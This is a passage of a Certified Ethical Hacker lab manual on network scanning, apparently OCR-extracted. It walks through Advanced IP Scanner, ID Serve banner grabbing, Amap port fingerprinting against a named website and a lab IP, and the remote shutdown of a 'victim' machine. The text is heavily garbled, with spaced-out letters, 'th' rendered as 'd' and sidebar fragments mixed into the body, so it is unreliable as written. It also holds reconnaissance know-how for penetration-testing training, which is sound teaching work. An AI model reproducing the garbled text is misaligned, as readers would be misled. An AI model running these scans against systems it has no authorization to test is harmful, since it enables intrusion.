You are on page 1of 182

CEH Lab Manual

S c a n n i n g

N e t w o r k s M o d u le 03

M o d u le 0 3 - S c a n n in g N e tw o rk s

S c a n n in g a T a r g e t N e tw o rk
S c a n n in g a n e tw o rk re fe rs to a s e t o f p ro c e d u re s fo r id e n tify in g h o s ts , p o /ts , a n d s e rv ic e s ru n n in g in a n e tw o rk .

L a b S c e n a r io
I CON KEY

Valuable information s Test your knowledge Web exercise Workbook review

H Q

Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization’s systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing and list die direats and vulnerabilities found in an organization’s network and perform port s c a n n in g , n e tw o rk s c a n n in g , and v u ln e ra b ility s c a n n in g ro identify IP/hostname, live hosts, and vulnerabilities.
L a b O b j e c t iv e s

The objective of diis lab is to help students in conducting network scanning, analyzing die network vulnerabilities, and maintaining a secure network. You need to perform a network scan to: ■ Check live systems and open ports ■ Perform banner grabbing and OS fingerprinting ■ Identify network vulnerabilities ■ Draw network diagrams of vulnerable hosts
ZZ7 T o o ls d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t
111

die lab, you need: ■ A computer running with W in d o w s S e r v e r 2 0 1 2 , W in d o w s W in d o w s 8 or W in d o w s 7 with Internet access ■ A web browser ■ Admiiiistrative privileges to run tools and perform scans
S e rv e r 2008.

L a b D u r a t io n

Time: 50 Minutes
O v e r v ie w o f S c a n n in g N e t w o r k s

Building on what we learned from our information gadiering and threat modeling, we can now begin to actively query our victims for vulnerabilities diat may lead to a compromise. We have narrowed down our attack surface considerably since we first began die penetration test with everydiing potentially in scope.

C E H Lab M anual Page S5

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. 111 fact even a seemingly harmless misconfiguration can be the nuiiing point in a penetration test that gives up the keys to the kingdom. For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then die risk associated with the anonymous read option is minimal. On die other hand, if you are able to read the entire file system using die anonymous FTP account, or possibly even worse, someone lias mistakenly left die customer's trade secrets in die FTP directory that is readable to die anonymous user; this configuration is a critical issue. Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of diem. As we will see in diis module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment. 1 1 1 diis module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.
Lab T asks TASK Overview 1

Pick an organization diat you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity. Recommended labs to assist you in scanning networks: ■ Scanning System and Network Resources Using A d v a n c e d
IP S c a n n e r ID S e r v e

■ Banner Grabbing to Determine a Remote Target System Using

■ Fingerprint Open Ports for Running Applications Using the A m a p Tool ■ Monitor TCP/IP Connections Using die C u r r P o r t s ■ Scan a Network for Vulnerabilities Using G F I _/ Ensureyouhave L readyacopyof the additional readings handed out for this lab. ■ Explore and Audit a Network Using N m ap ■ Scanning a Network Using die
N e t S c a n T o o ls Pro LA N S u rv ey o r Tool

L an G u ard 2 0 1 2

■ Drawing Network Diagrams Using ■ Mapping a Network Using the ■ Scanning a Network Using die

F r ie n d ly P in g e r N essu s

Tool

■ Auditing Scanning by Using G lo b a l ■ Anonymous Browsing Using P r o x y

N e tw o rk In v e n to ry S w it c h e r

C E H Lab M anual Page 86

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Daisy Chaining Using P r o x y

W o rk b e n c h

■ HTTP Tunneling Using H T T P o r t ■ Basic Network Troubleshooting Using the
M e g a P in g

■ Detect, Delete and Block Google Cookies Using G -Z a p p e r ■ Scanning the Network Using the
C o la s o f t P a c k e t B u ild e r Dude

■ Scanning Devices in a Network Using T h e
L a b A n a ly s is

Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure duough public and free information.

P LEA S E T A LK TO YO U R IN S T R U C T O R IF YOU H A V E Q U ES T IO N S R E L A T E D TO TH IS LAB.

C E H Lab M anual Page 87

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

S c a n n in g S y s te m a n d N e tw o rk R e s o u r c e s U s in g A d v a n c e d IP S canner
I CON KEY
-A d v a n c e d IP S c a n n e r is a fr e e n e tir o r k s c a n n e r th a t g iv e s y o n v a rio u s ty p e s o f

/ =‫ ־‬Valuable information ✓ Test your knowledge Web exercise Workbook review

in fo rm a tio n re g a rd in g lo c a l n e tir o r k c o m p u te rs .

L a b S c e n a r io

S

C Q

this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.
111

L a b O b j e c t iv e s

l —J

T o o ls

The objective of this lab is to help students perform a local network scan and discover all the resources 011 die network. You need to: ■ Perform a system and network scan ■ Enumerate user accounts ■ Execute remote penetration ■ Gather information about local network computers
L a b E n v ir o n m e n t

d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

Q Y oucanalso dow nloadA dvancedIP Scanner from http:/1w w w .advanced-ipscanner.com .

111

die lab, you need: ■ Advanced IP Scanner located at Z:\\C EH v8
M od ule 0 3 S c a n n in g N e tw o rk s\ S c a n n in g T o o ls A d v a n c e d IP S c a n n e r

■ You can also download the latest version of A d v a n c e d from the link http://www.advanced-ip-scanner.com

IP S c a n n e r

C E H Lab M anual Page 88

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

/ 7A dvancedIPScanner w orks onW indow sS erver 2003/ Server 2008andon W indow s 7(32bit, 64bit).

■ If you decide to download the in the lab might differ ■ A computer running W in d o w s
8

la t e s t v e r s io n ,

then screenshots shown

as die attacker (host machine)
se rve r 2008

■ Another computer running W in d o w s machine) ■ A web browser widi In te rn e t
access

as die victim (virtual

■ Double-click ip s c a n 2 0 .m s i and follow die wizard-driven installation steps to install Advanced IP Scanner
■ A d m in is tra tiv e

privileges to run diis tool

L a b D u r a t io n

Time: 20 Minutes
O v e r v ie w o f N e t w o r k S c a n n in g

Network scanning is performed to c o lle c t in fo rm a tio n about liv e s y s t e m s , open ports, and n e tw o rk v u ln e ra b ilitie s. Gathered information is helpful in determining t h r e a t s and v u ln e r a b ilitie s 111 a network and to know whether there are any suspicious or u n a u th o rize d IP connections, which may enable data theft and cause damage to resources.
Lab T asks
S T A S K 1

1. Go to S ta r t by hovering die mouse cursor in die lower-left corner of die desktop

L a u n c h in g A d v a n c e d IP Scann er

FIG U R E1 .1 :W indow s8- D esktopview 2. Click A d v a n c e d (Windows 8).
IP S c a n n e r

from die S ta r t menu in die attacker machine

C E H Lab M anual Page 89

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

S ta rt

Admin ^

WinRAR

Mozilla Firefox

Command

Prompt
it t

Fngago Packet b uilder

Nc m

2*

C om puter

m W ithA dvancedIP Scanner, youcanscan hundreds ofIP addresses sim ultaneously.

M icrosoft Clip O rganizer

Advanced IP Scanner

Sports

tS
C ontrol Panel
i i i l i l i

m
M icrosoft O ffice 2010 Upload...

finance

FIG U R E1 2. W indow s8- A pps 3. The A d v a n c e d
IP S c a n n e r

main window appears.

Y oucanw ake any m achinerem otelyw ith A dvancedIP Scanner, if theW ake-on‫־‬LA Nfeature is supportedbyyour netw orkcard.

FIG U R E1 3 :T heA dvancedIPS cannerm ainw indow 4. Now launch die Windows Server 2008 virtual machine (v ic tim ’s
m a c h in e ).

C E H Lab M anual Page 90

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

L _/ Y ouhaveto guess a rangeof IP address of victimm achine.

iik

O

jf f lc k 10:09 F MJ

FIG U R E1 .4 :T hevictimm achineW indow sserver2 008
a R adm in2.xand3.x Integrationenableyouto connect (ifR adm inis installed) to rem ote com puters w ithjust one dick.

5. Now, switch back to die attacker machine (Windows 8) and enter an IP address range in die S e le c t ra n g e field. 6. Click die S c a n button to start die scan.

The status of scanis show nat the bottomleft sideofthew indow .

7.

A d v a n c e d IP S c a n n e r

displays the s c a n

scans all die IP addresses within die range and r e s u lt s after completion.

C E H Lab M anual Page 91

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

L ists of com puters savingandloadingenable youtoperformoperations w ithaspecificlist of com puters.Just savealist ofm achines youneedand A dvancedIPScanner loads it at startupautom atically.

A d v a n c e d IP Scanner
File Actions Settings View Heip

J►
R esits

Scar'

Jl

r=£k=3 r f t o

IP c d id 3? f i l :

Like us on ■ 1 Facebook

1 0 .0 .0 .1 1 0 .0 .0 .1 0
| Favorites | Status 0

w
15

r
10.0.0.1 WIN-MSSELCK4K41 WINDOWS# WIN*LXQN3WR3R9M WIN-D39MR5H19E4 10.0.a1

Manufacturer Nlctgear, Inc. Dell Inc Microsoft Corporation M icrosoft Corporation Dell Inc

MAC address 00:09:5B:AE:24CC DO:67:ES:1A:16:36 00: 5:5D: A8:6E:C6

‫> ט‬£* ® & ®

10 .0.a2
10.0.03 10.0.05 10.0.07

1

00:15:5D:A8:&E:03 D4:3E.-D9: C3:CE:2D

m G roup O perations: A nyfeatureofA dvanced IP Scanner can beused w ithanynum ber of selectedcom puters. For exam ple, youcanrem otely shut dow nacom plete com puter classw ithafew dicks.

5a iv*, 0 d«J0, S unknown

FIG U R E1 .6 :TheA dvancedIPS cannerm ainw indowafterscanning 8. You can see in die above figure diat Advanced IP Scanner lias detected die victim machine’s IP address and displays die status as alive
M T A S K 2

9. Right-click any of die detected IP addresses. It will list Wake-On-LAN. Shut down, and Abort Shut d o w n

Extract Victim’ s IP Address Info

5‫־‬
F ie A ctions Settings View Helo Scan

A d v a n c e d IP Scanner

II

ip c

u u

*

*sS:

W i

Like us on Facebook

1 0 .0 .0 .1 1 0 .0 .0 .1 0
Resuts Status Favorites | Name

IHLMItHMM,
WINDOWS8

1 0 .0 .0 .1


t* p ‫׳‬ore Copy

1 0 . 0 . 0 1 1

n

to ru fa c tu re r Netgear. In c M icrosoft Corporation M icrosoft Corporation Dell Inc

MAC address
00:09:5B:AE:24CC D0t67:E5j1A:16«36 □0:15 :‫צ‬U: A8:ofc:Ot> 00:15:SD:A8:6E:03 CW:BE:D9:C3:CE:2D

hi

WIN-LXQN3WR3 WIN‫ ־‬D39MR5HL<

Add to ‘Favorites' Rescan selected Sive selected... Wdke‫־‬O n‫־‬LAN Shut dcwn... Abort shut dcwn

!

W ake-on-L A N :Y ou canw akeanym achine rem otelyw ithA dvancedIP Scanner, ifW ake-on-LA N featureis supportedby your netw orkcard.
a

Radrnir 5 alive. 0 dead, 5 unknown

FIG U R E1 .7 :T heA dvancedIPS cannerm ainw indoww ithA liveH ost list 10. The list displays properties of the detected computer, such as IP address. N a m e , M A C , and N e t B I O S information. 11. You can forcefully Shutdown, Reboot, and Abort S h u t d o w n die selected victim machine/IP address

C E H Lab M anual Page 92

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

& File Actions Settings View Help

‫״‬ m si *
S h u td o w n o p tio n s

r
Scan

Use Vtindcms authentifcation

J!] .■ ]

Jser narre:
9essM ord:

Like us on Facebook

W infingerprint Input O ptions: ■ IPR ange (N etm askand InvertedN etm ask supported) IPL istS m gle H ost N eighborhood

11 0.0.0.1-100.0.10 Results | Status ® a Favorites |

rn e o c t (sec): [60 Message: Name 1a0.0.1 WIN-MSSELCK4K41 W IND O W S WIN-LXQN3WR3R9M WIN-D39MR5HL9E4 jre r MAC address 00;C9;5B:AE:24;CC

3

D0:67:E5:1A:16:36
It ion It ion 00:15:3C:A0:6C:06 00:13:3D:A8:6E:03 D4:BE:D9:C3:CE:2D

»

$ a

I”

Forced shjtdo/vn

f " Reooot

S alive, Odcad, 5 unknown

FIG U R E1 .8 :TheA dvancedIPS cannerC om puterpropertiesw indow 12. Now you have die machine.
IP address. Nam e,

and other

details

of die victim

13. You can also try Angry IP scanner located at

D:\CEH-Tools\CEHv8

Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner

It

also scans the network for machines and ports.
L a b A n a ly s is

Document all die IP addresses, open ports and dieir running applications, and protocols discovered during die lab. Tool/U tility Information Collected/Objectives Achieved Scan Information: Advanced IP Scanner ■ ■ ■ ■ ■ ■ IP address System name MAC address NetBIOS information Manufacturer System status

C E H Lab M anual Page 93

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A LK TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Examine and evaluate the IP addresses and range of IP addresses.

Internet Connection Required □ Yes Platform Supported 0 Classroom 0 iLabs 0 No

C E H Lab M anual Page 94

Eth ica l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

B a n n e r G ra b b in g t o D e te r m in e a R e m o t e T a r g e t S y s t e m u s i n g ID S e rv e
ID S S e rv e is u s e d to id e n tify th e m a k e , ///o d e /, a n d v e rs io n o f a n y w e b s ite 's s e rv e r s o fh v a re .

I CON

KEY

L a b S c e n a r io

Valuable information

y*

Test your knowledge Web exercise

1 1 1 die previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer flow, SQL injection, and web application on a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them and crack into die network and cause server damage. Therefore, it is extremely important for penetration testers to be familiar widi banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine die role of servers within a network. 111 diis lab, you will learn die banner grabbing technique to determine a remote target system using ID Serve.
L a b O b j e c t iv e s

O

Workbook review

The objective of diis lab is to help students learn to banner grabbing die website and discover applications running 011 diis website.
111
O T o o ls

diis lab you will learn to: ■ Identify die domain IP address ■ Identify die domain information

d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

L a b E n v ir o n m e n t

To perform die lab you need: ■ ID Server is located at D :\ C E H -T o o ls \ C E H v 8
N e t w o r k s \ B a n n e r G ra b b in g T o o ls \ ID S e r v e M o d u le 0 3 S c a n n in g

C E H Lab M anual Page 95

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

■ You can also download the latest version of ID http: / / www.grc.com/id/idserve.htm ■ If you decide to download the in the lab might differ
la t e s t v e r s io n ,

S e rv e

from the link

then screenshots shown

■ Double-click id s e r v e to run

ID S e r v e S e rv e

■ Administrative privileges to run die ID ■ Run this tool on W in d o w s
L a b D u r a t io n

tool

S erv er 2012

Time: 5 Minutes
O v e r v ie w o f ID S e r v e

ID Serve can connect to any s e r v e r po rt on any d o m a in or IP address, then pull and display die server's greeting message, if any, often identifying die server's make, model, and v e r s io n , whether it's for F T P , SMTP, POP, NEW’S, or anything else.
Lab T asks TASK 1

1. Double-click id s e r v e located at D :\C E H -T o o ls\C E H v 8
N e tw o rk s\ B a n n e r G ra b b in g T o o ls\ID S e r v e

M o d u le 0 3 S c a n n in g

Id en tify w e b s it e s e r v e r in fo rm atio n

2. 1 1 1 die main window of ID S e v e r Q u e ry tab
0

S erv e

show in die following figure, select die
‫׳‬- r o

ID Serve

ID Serve
Background

In te rn e tServer Id e n tific a tio nU tility ,vl .0 2 Personal SecurityFreew arebySteveG ib so n
Copyright (c) 2003 by Gibson Research Corp

Server Query | Q&A/Help

ri

Enter

01

copy / paste an Internet server URL 0 * IP address here (example www rmcrosoft com)

r!
Server

Queiy The Server

^

When an Internet URL or IP has been provided above press this button to rwtiate a query of the speahed server

If anIPaddressis enteredinsteadof aU R L , IDServew ill attem pt to determ ine thedom ain nam e associatedw iththe IP

^ 4
Copy

The server identified <se* as

goto ID Serve web page

E*it

FIG U R E21: M ainw indowofIDS erv e 3. Enter die IP address 01‫־‬URL address in E n t e r o r C o p y /p a ste
s e r v e r U R L o r IP a d d r e s s h e re : a n In te rn a l

C E H Lab M anual Page 96

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

ID Serve

ID Serve
Background
Entei or copy

In tern et Server IdentificationU tility, vl .0 2 Personal SecurityFreeware bySteve G ibson C o p y rig h t(c) 2 0 0 3b yG ib s o nR e s e a rc hC o r p .

Server Q uery I Q&A/tjelp

I paste an Internet serve* URL or IP adtfress here (example

www microsoft com)

^ [w w w certifiedhacker com [

IDServecanaccept the U R Lor IP as a com m and-lineparam eter

Query T h e S w v e i

W h e n an Internet URL 0* IP has been piovided above, piess this button to initiate a query 01 the s p e c fo d server

(%

Server query processing

The server identified itse l as

Copy

G oto ID S eive web page

Ejjit

FIG U R E22 E nteringdieU R Lforquery 4. Click Query The Server; it shows server query processed information
ID Serve

,‫ ־‬m x

‫׳‬

ID Serve
Background

In tern etServer IdentificationU tility, vl .0 2 Personal SecurityFreeware bySteve G ibson C o p y rig h t(c) 2 0 0 3b yG ib s o nR e s e a rc hC o fp

Server Query | Q&A/Help

< T | www.certifiedhacker.com|

Enter or copy / paste an Internet seivef URL or IP address here (example www m»c10s0ft com)

Q IDServecanalso connect w ithnon-w eb servers toreceiveand report that server'sgreeting m essage. Thisgenerally reveals the server's m ake, m odel, version, andother potentiallyuseful inform ation.

r2 [

Query The Server

W h e n an Internet URL 0* IP has been piovided above, press this button to initiate a queiy of the speafied server

(3

Seiver query processing

In itia tin gserverq u e ry Lo o k in gu pIPaddressfo rd o m a in w w wcertified h ackerc o m T h eIPaddressfo rth ed o m a inis 2 0 2 .7 55 41 0 1 C o n n e c tin gtoth eservero nsta n d a rdHTTPp o rt: 8 0 C o n n ected ]R eq u estin gth eserver's d e fa u ltp ag e
The server identrfied itse l as

a

M ic r o s o f t - I I S / 6 . 0

Copy

Goto ID Serve web page

Exit

FIG U R E23: S erverprocessedinform ation

L a b A n a ly s is

Document all die IP addresses, dieir running applications, and die protocols you discovered during die lab.

C E H Lab M anual Page 97

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Tool/U tility

Information Collected/Objectives Achieved IP address: 202.75.54.101 Server Connection: Standard HT1P port: 80 Response headers returned from server:

ID Serve

■ ■ ■ ■ ■

H TTP/1.1 200 Server: Microsoft-IIS/6.0 X-Powered-By: PHP/4.4.8 Transfer-Encoding: chunked Content-Type: text/html

PLEA SE T A LK TO YOUR IN S T R U C T O R IF YOU H AV E R E L A T E D TO TH IS LAB.

QUESTIONS

Q u e s t io n s

1. Examine what protocols ID Serve apprehends. 2. Check if ID Serve supports https (SSL) connections. Internet Connection Required □ Yes Platform Supported 0 Classroom 0 iLabs 0 No

C E H Lab M anual Page 98

Eth ica l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

F in g e rp r in tin g O p e n P o r ts U s in g t h e A m ap Tool
.- b n a p d e te rm in e s a p p lic a tio n s ru n n in g o n e a c h o p e n p o r t.

I CON KEY
2 ^

L a b S c e n a r io

Valuable information Test vour knowledge

g
Q

Web exercise Workbook review

Computers communicate with each other by knowing die IP address in use and ports check which program to use when data is received. A complete data transfer always contains the IP address plus the port number required. 1 1 1 the previous lab we found out that die server connection is using a Standard HTTP port 80. If an attacker finds diis information, he or she will be able to use die open ports for attacking die machine. 1 1 1 this lab, you will learn to use the Amap tool to perform port scanning and know exacdy what a p p lic a t io n s are running on each port found open.
L a b O b j e c t iv e s

C 5 T o o ls d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

The objective of diis lab is to help students learn to fingerprint open ports and discover applications 11 inning on diese open ports. hi diis lab, you will learn to: ■ Identify die application protocols running on open ports 80 ■ Detect application protocols
L a b E n v ir o n m e n t

To perform die lab you need: ■ Amap is located at
D :\ C E H -T o o ls \ C E H v 8 M o d u le 0 3 S c a n n in g N e t w o r k s \ B a n n e r G ra b b in g T o o lsV A M A P

■ You can also download the latest version of A M A P from the link http: / / www.thc.org dic-amap. ■ If you decide to download the in the lab might differ
la t e s t v e r s io n ,

then screenshots shown

C E H Lab M anual Page 99

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

■ A computer running Web Services enabled for port ■ Administrative privileges to run die A m a p tool ■ Run this tool on W in d o w s
L a b D u r a t io n
S e rv e r 2012

80

Time: 5 Minutes
O v e r v ie w o f F in g e r p r in t in g

Fingerprinting is used to discover die applications running on each open port found 0x 1 die network. Fin g erp rin tin g is achieved by sending trig g e r p a c k e t s and looking up die responses in a list of response strings.
at T A S K
Id en tify A p p lic a tio n P ro to c o ls R u n n in g on P o rt 8 0

1

Lab T asks

1. Open die command prompt and navigate to die Amap directory. 1 1 1 diis lab die Amap directory is located at D :\C E H -T o o ls\C E H v 8 M od ule 0 3 S c a n n in g
N e tw o rk s\ B a n n e r G ra b b in g T o o ls\A M A P

2. Type a m a p
33

w w w .c e r t if ie d h a c k e r .c o m 8 0 ,

and press E n te r.

Administrator: Command Prompt

[D :\ C E H ~ T o o ls \C E H u 8 M o d u le 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g T o o l s \A M A P > a n a p uw [u . c e r t i f i o d h a c h e r . c o m 80 Anap 0 5 . 2 <w w w . t h e . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 4 2 - MAPPING modo Jn id en tifie d p o rts: 2 0 2 . ? 5 . 5 4 .1 0 1 : 8 0 / t c p < t o t a l 1>.

M ap 0 5 .2 f i n i s h e d a t 2012-08-28 1 2 :2 0 :5 3 D :\ C EH -T 0 0 1 s \C E H 08 M o d u le 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tool s\AMAP>

Syntax: am ap [-A| ‫־‬ B| -P|-W ] [-1buSR H U dqv] [[-m ] -o <file>] [-D<file>] [‫־‬t/‫־‬T sec] [-c cons] [-Cretries] [-pproto] [‫־‬i <file>] [target port [port]...] FIG U R E3 .1 :A m apw ithhostnam ew w w .ce1tifiedl1ack e1.com w ithPort S O 3. You can see die specific a p p lic a tio n protocols running 011 die entered host name and die port 80. 4. Use die IP
a d d re ss

to check die applications running on a particular port.

5. 1 1 1 die command prompt, type die IP address of your local Windows Server 2008(virtual machine) a m a p 1 0 .0 .0 .4 75-81 (lo c a l W in d o w s S e r v e r 2 0 0 8 ) and press E n t e r (die IP address will be different in your network). ✓ For A m apoptions, type am ap-help. 6. Try scanning different websites using different ranges of switches like amap www.certifiedhacker.com 1-200

C E H Lab M anual Page 100

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Coundl A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

‫ד‬
D :\ C E H -T o o ls \C E H u 8 Module 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tools\AMAP>amap I f . 0 . 0 . 4 75-81 laroap v 5 . 2 <w w w . t h c . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 1 - MAPPING mode P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - a p a c h e - 2 W arn in g : C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 6 / t c p , d i s a b l i n g
KN>

C om piles on all U N IX basedplatform s - even M acO SX ,C ygw inon W indow s, A R M -L inuxand Palm O S

p o r t <EUN p o r t <EUN p o r t <EUN p o r t <EUN p o r t <EUN

W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b l e ) t o
KH>

1 0 .0 .0 .4 :7 5 /tc p , d isab lin g 1 0 .0 .0 .4 :7 7 /tc p , d isab lin g

K H > W arning: K N > K N >

W arn in g : Could n o t c o n n e c t < u n r e a c h a b l e > to

Could n o t c o n n e c t ( u n r e a c h a b l e ) to 1 0 . 0 . 0 . 4 : 7 8 / t c p , d i s a b l i n g 1 0 .0 .0 .4 :7 9 /tc p , d isab lin g

W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b l e > t o |KN> W arn in g : C ould n o t c o n n e c t < u n r e a c h a b l e > t o P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - i i s P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s webmin

1 0 . 0 . 0 . 4 : 8 1 / t c p , d i s a b l i n g p o r t <EUN

U n id e n tified p o rts : 1 0 .0 .0 .4 :7 5 /tc p 1 0 .0 .0 .4 :7 6 /tc p 1 0 .0 .0 .4 :7 7 /tc p 1 0 .0 .0 .4 :7 8 / kcp 1 0 .0 .0 .4 :7 9 / t c p 1 0 .0 .0 .4 :8 1 /tc p < to t a l 6>. Linap v 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 4 b : \ C E H - T o o l s \ C E H v 8 Module 03 S c a n n i n g N e tw o r k N B a n n e r G r a b b i n g Tools\AMAP>

FIG U R E3 .2 :A m apw ithIPaddressandw ithrangeofsw itches7 3 -8 1
L a b A n a ly s is

Document all die IP addresses, open ports and dieir running applications, and die protocols you discovered during die lab. Tool/U tility Information Collected/Objectives Achieved Identified open port: 80 WebServers: ■ 11ttp-apache2 ‫־‬ ■ http-iis ■ webmin Amap Unidentified ports: ■ 10.0.0.4:75/tcp ■ 10.0.0.4:76/tcp ■ 10.0.0.4:77/tcp ■ 10.0.0.4:78/tcp ■ 10.0.0.4:79/tcp ■ 10.0.0.4:81/tcp

C E H Lab M anual Page 101

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

P L E A S E T A LK TO YO UR IN S T R U C T O R IF YOU H A V E Q U ES T IO N S R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Execute the Amap command for a host name with a port number other than 80. 2. Analyze how die Amap utility gets die applications running on different machines. 3. Use various Amap options and analyze die results. Internet Connection Required
0 Y es

□ No

Platform Supported 0 Classroom □ iLabs

C E H Lab M anual Page 102

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

M o n ito r in g T C P /IP C o n n e c t i o n s U s in g t h e C u r r P o r ts T o o l
C u n P o r ts is n e tw o rk m o n ito rin g s o fh ia re th a t d is p la y s th e lis t o f a ll c u r re n tly o p e n e d T C P / IP a n d U D P p o r ts o n y o u r lo c a l c o m p u te r.

I CON K E Y
Valuable information Test your knowledge

L a b S c e n a r io

111 the previous lab you learned how to check for open ports using the Amap tool. As an e t h ic a l h a c k e r and p e n e t r a t io n t e s t e r , you must be able to block such attacks by using appropriate firewalls or disable unnecessary services running 011 the computer. You already know that the Internet uses a software protocol named T C P / IP to format and transfer data. A11 attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and to the packet payloads with which he or she can hijack the connection. As the attacker has all die information 011 the network, he or she can create false packets in the TCP connection. As a
a d m in is tra to r., your daily task is to check the T C P / IP of each server you manage. You have to m o n ito r all TCP and UDP ports and list all the e s t a b lis h e d IP a d d r e s s e s of the server using the C u r r P o r t s tool. n etw o rk c o n n e c t io n s

w
m

Web exercise Workbook review

C J T o o ls d e m o n stra te d in t h is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

L a b O b j e c t iv e s

The objective of diis lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.
111

in this lab, you need to: ■ Scan the system for currently opened ■ Gather information 011 die ■ List all the
IP a d d r e s s e s p o r ts T C P / IP

and

UDP

ports

and

p ro cesses

that are opened

that are currendy established connections

